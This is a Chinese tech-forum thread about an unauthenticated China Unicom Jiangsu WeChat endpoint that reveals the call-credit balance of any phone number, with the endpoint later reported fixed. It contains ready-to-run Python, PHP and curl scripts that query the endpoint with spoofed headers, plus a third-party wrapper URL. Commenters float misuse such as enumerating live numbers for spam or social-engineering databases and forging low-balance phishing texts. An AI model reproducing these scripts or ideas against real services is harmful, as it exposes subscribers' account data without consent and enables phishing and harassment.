转自吾爱。不知道联通不做鉴权直接开放给公网随意查询是否合适。
python:
import requests
import json
# 联通手机号码
phone = "xxxxxxxxxxx"
url = " weixin.10010js.com/app/charge/qryRealFee"
headers = {
"Host": "weixin.10010js.com",
"Content-Type": "application/json",
"Cache-Control": "no-cache",
"Content-Length": "23",
"Accept": "/",
"Referer": " weixin.10010js.com/actPage/activity/index28.html?",
"Accept-Language": "zh-cn",
"User-Agent": "Mozilla/5.0 (Linux; U; Android 8.1.0; zh-cn; BLA-AL00 Build/HUAWEIBLA-AL00) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.132 MQQBrowser/8.9 Mobile Safari/537.36"
}
data = {
"phone": phone
}
req = requests.post(url, json.dumps(data), headers=headers)
money = int(req.text)/100
print(money)

php:
<?php
$url=" weixin.10010js.com/app/charge/qryRealFee";
$data='{"phone":'.'"'.$_GET["phone"].'"}';
echo "您的帐户余额是:".(curl_post($url,$data)/100)."元人民币";
function curl_post($url,$data){
$headers = array(
"Host:weixin.10010js.com",
"Content-Type:application/json",
"Cache-Control:no-cache",
"Content-Length:23",
"Accept:/",
"Referer: weixin.10010js.com/actPage/activity/index28.html?",
"Accept-Language:zh-cn",
"User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
$output = curl_exec($ch);
curl_close($ch);
return $output;
}
?>

有人做好现成的,可以直接试试:
调用地址: api.dooper.top:8899/api/liantong/?nub=
请求方式:GET
返回类型:JSON
请求示例: api.dooper.top:8899/api/liantong/?nub=13288888888

试了下,确实可以直接查到准确的话费余额。
话费余额没有过于敏感的信息,在已知有查话费的 API 的前提下,我更担心有没有类似的可以查身份、姓名、地址等敏感信息的 API,这个 api 不大可能只有这一个业务。

示例号码 80 万话费,擦。。。

这个锅谁来背一下

要是真能爆出来这样的 API,先把那个示例号码查一查,满足下好奇心

联通 app 补卡的时候 输入补办号码后 身份证信息是前端验证的(疑似)

话费也不能公开查啊,很容易伪造成话费不足的钓鱼信息。

应该是微信的 API,被抓了。

2022 年都快来了,居然还见到了只有 http,不支持 https 的接口。

#8 国企啊!太正常了吧,我相信不止联通公司一架,一定还有!

18666666666 里面有 4 万多余额

那个不是联通的。

两位,看清楚啊,http 是别人封装的

主办单位:中国联合网络通信有限公司江苏省分公司

试了下,其中三个 header 还是必须要有的,所以还是有做少量校验的,你们要求还是太高了。(

PHO=13233233233 \
&& RET=$(curl \
-H "Referer: weixin.10010js.com/actPage/activity/index28.html?" \
-H "Content-Length:23" \
-H "Content-Type:application/json" \
--data "{\"phone\":\"$PHO\"}" \
" weixin.10010js.com/app/charge/qryRealFee" \
-s) && sed -e "s/\(.*\)\(..\)/\1.\2/" <<< $RET | xargs printf "%s" && printf "\x1b[31mRMB\x1b[0m\n"

印象中有一些充值服务的地儿只要输入了手机号就会显示余额,估计是类似接口

配合 surge 做个 shortcut,方便多了

之前联通话费接口还能查到姓的首字母➕名字最后一个字呢

太正常了,联通的业务大部分都是外包出去的,这个只是把话费余额泄露了,前不久连联通最核心的三户信息都暴露出来了。

依然有些涉及暴露隐私,比如先便利一圈,看看那些号是有人用的,然后发 ad 短信或者营销等等。当年生日管家骚扰的接口被我扫了一下,总结出来的风险用途

先持续关注下,后续没问题就自己做没有话费提示接口

话费余额 80 多万把我震惊了... 果然还是贫穷限制了我的想象力,我连开 10 块钱的流量包都要纠结好久 :(

weixin.10010js.com ?

可以做个插件,来电显示对方话费(并没有什么卵用

我信了。

不如在微信上做个 hook,在联系人名字后面加个话费,对于穷的话费都几十几十充就就不用和他聊了😂(开玩笑)

有个朋友想通过姓名查下电话,不知当问不当问

从 API 的命名来看,这个还真的就是只查话费的

应该可以再来一个 alfred workflow 一键查询

能不能把电信移动也撸了?

#23 应该是去电显示,这样就知道是不是真的停机了(笑

那如果用来轮询,验证号码是否存活不是随随便便事,社工库+1

实测部分号码(也可能是号段原因)无法查询

[{"code":"404","message":"Please check if the number is correct."}]

号码没有问题

貌似修复了 上午还能查到的号码 现在就查不到了

404 了

其实运营商可以弄一个 API 给个人使用,加个密钥就行了,每天限制查询次数也行。

应该是,源 API 关了,显示 404,#32 是我请求封装后的结果

#33
果然,404 了

我写了个面向 Surge 的联通查话费 Script

需要的自行使用

github.com/alanhg/surge-config/blob/4ab9d44dbff9270ced701571c78dbca561377f76/query-fee.js

我打少字了。我意思是说:这个应该是抓江苏联通在微信上的小程序或者公众号的 API

原来如此了,404,我估计他们是改了地址,哈哈

修复了